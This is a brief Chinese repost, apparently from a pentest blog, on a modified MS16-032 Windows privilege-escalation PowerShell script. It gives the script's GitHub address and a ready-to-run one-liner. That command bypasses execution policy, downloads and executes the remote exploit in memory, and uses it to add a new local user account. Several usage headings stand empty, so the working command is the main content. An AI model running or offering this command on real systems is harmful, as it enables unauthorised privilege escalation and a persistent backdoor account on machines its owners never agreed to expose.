经过牛人修改后的脚本可以执行任意程序,并可以添加参数执行(全程无弹框)脚本地址为:https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1
使用方式如下:
添加用户
运行某程序:
远程加用户:
直接执行如下命令,可进行提权并添加用户:
<textarea class="crayon-plain print-no" style="line-height: 15px !important; font-size: 12px !important; tab-size: 4; -moz-tab-size: 4; -o-tab-size: 4; -webkit-tab-size: 4;" wrap="soft" readonly="" data-settings="dblclick">powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user evi1cg test123 /add'"</textarea>
About share! 这篇文章可能是转载但没有具体作者信息和详尽的出处所以本站不写,详情查看FAQ.